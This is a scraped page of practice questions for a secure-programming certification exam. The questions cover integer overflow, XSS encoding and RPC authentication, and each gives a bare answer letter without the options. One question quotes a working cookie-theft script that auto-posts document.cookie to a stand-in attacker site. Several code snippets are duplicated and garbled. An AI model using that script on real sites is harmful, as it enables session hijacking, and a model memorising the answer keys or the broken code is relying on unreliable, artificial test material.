EC-COUNCIL EC-Council Certified Secure Programmer v2 - 312-92 Exam Practice Test
What type of problem will result if the following statement is used?
int main()
{
short int a;
unsigned short int=b32768;
a=b;
printf( " a = %d", a);
b=65535;
a=b;
printf( " a = %d", a);
}
int main()
{
short int a;
unsigned short int=b32768;
a=b;
printf( " a = %d", a);
b=65535;
a=b;
printf( " a = %d", a);
}
Correct Answer: D
Vote an answer
Tyler is in the applicaion testing phase of a particular project. He has decided to use the White Box testing method. Tyler has made a number of changes to his code after some initial tests found some bugs. Tyler now needs to test the code with those changes in place.
What type of testing is Tyler getting ready to perform?
What type of testing is Tyler getting ready to perform?
Correct Answer: A
Vote an answer
What is one of the dominant factors that lead to insecure programming?
Correct Answer: A
Vote an answer
Gerald is a web security consultant for Protectors International. Gerald's main responsibility is to search the Internet for malicious and deceitful sites that the public should be aware of.
Gerald was tipped off about a particular site and is now looking over its source code in a protected environment. Gerald finds the following snippet particularly interesting. What has Gerald stumbled upon?
<script>
document.write('<form name=hack method=post action="http://
scarysite.com/getit.php">
<input type=hidden name=sid value="' + escape(document.cookie) +
'">');
document.hack.submit();
</script>
Gerald was tipped off about a particular site and is now looking over its source code in a protected environment. Gerald finds the following snippet particularly interesting. What has Gerald stumbled upon?
<script>
document.write('<form name=hack method=post action="http://
scarysite.com/getit.php">
<input type=hidden name=sid value="' + escape(document.cookie) +
'">');
document.hack.submit();
</script>
Correct Answer: B
Vote an answer
Processes having the "CAP_NET_BIND_SERVICE" can listen on which ports?
Correct Answer: B
Vote an answer
Darren has just been hired on as the SQL dba for Fredrickson Inc., a marketing firm in New York City. He has been asked to clearn up the SQL databases on one of the servers. What SQL stored procedure could Darren use to remove user accounts from the databases?
Correct Answer: B
Vote an answer
What security package is implemented with the following code?
dwStatus = DsMakSpn
(
"ldap",
"MyServer.Mydomain.com",
NULL,
0,
NULL,
&pcSpnLength,
pszSpn
);
rpcStatus = RpcServerRegisterAuthInfo
(
psz
RPC_C_AUTHN_GSS_NEGOTIATE,
NULL,
NULL
);
dwStatus = DsMakSpn
(
"ldap",
"MyServer.Mydomain.com",
NULL,
0,
NULL,
&pcSpnLength,
pszSpn
);
rpcStatus = RpcServerRegisterAuthInfo
(
psz
RPC_C_AUTHN_GSS_NEGOTIATE,
NULL,
NULL
);
Correct Answer: B
Vote an answer
After learning from an external auditor that his code was susceptible to attack, George decided to rewrite some of his code to look like the following. What is George preventing by changing the code?
public voif doContent(...) {
...
String s;
if ((s = getUsernameByID("userid")) != null) {
s = StringUtils.encodeToHTML(s, 50);
response.write("<br>Applicant:<u>" + s +
"</u>");
}
...
}
public voif doContent(...) {
...
String s;
if ((s = getUsernameByID("userid")) != null) {
s = StringUtils.encodeToHTML(s, 50);
response.write("<br>Applicant:<u>" + s +
"</u>");
}
...
}
Correct Answer: A
Vote an answer
Kevin is developing a webpage using html and javascript code. The webpage will have a lot of important content and will have a number of functions that Kevin does not want revealed through the source code. Why would Kevin choose to employ HTML Guardian to hide the source code of his webpage?
Correct Answer: D
Vote an answer
What is defined as the practice of using selected process techniques to improve the quality of a software development effort?
Correct Answer: B
Vote an answer